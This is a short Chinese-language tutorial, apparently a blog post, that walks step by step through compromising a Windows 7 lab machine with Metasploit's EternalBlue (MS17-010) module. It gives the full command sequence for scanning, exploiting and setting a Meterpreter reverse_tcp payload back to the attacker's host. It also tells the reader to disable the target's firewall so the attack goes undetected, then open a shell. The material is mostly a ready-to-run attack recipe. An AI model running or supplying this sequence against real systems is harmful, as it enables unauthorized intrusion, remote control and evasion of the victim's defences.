Web渗透小案例——利用Metasploit(MSF)拿下Windows7
开启MSF
开启数据库:
service postgresql start
初始化msf数据库(第一次使用msf需要):
msfdb init
开启MSF:
msfconsole
查看数据连接状态:
db_status
攻击开始
使用Auxiliary辅助模块嗅探目标
选择模块:
use auxiliary/scanner/smb/smb_ms_17_010
设置目标主机并开始测试:
绿色+表示有可能出现漏洞
选择和设置攻击模块
我们选择永恒之蓝模块进行攻击,并设置目标的ip
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.83.156(靶机ip)
查看可用payload
show payloads
我们选择反向连接reverse
设置反向连接payload和本机地址
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.83.154(本机ip)
运行攻击脚本
输入run进行攻击
run
成功拿下主机。
拿下服务器后的工作
关闭靶机防火墙
检测到攻击,靶机会在一分钟后进行重启。关掉靶机的防火墙,靶机就不会再检测攻击。
拿到shell权限
输入shell拿到shell权限
shell
如有乱码,请更改Kali机的终端编码格式。
拿到了shell权限,我们就可以进行更多操作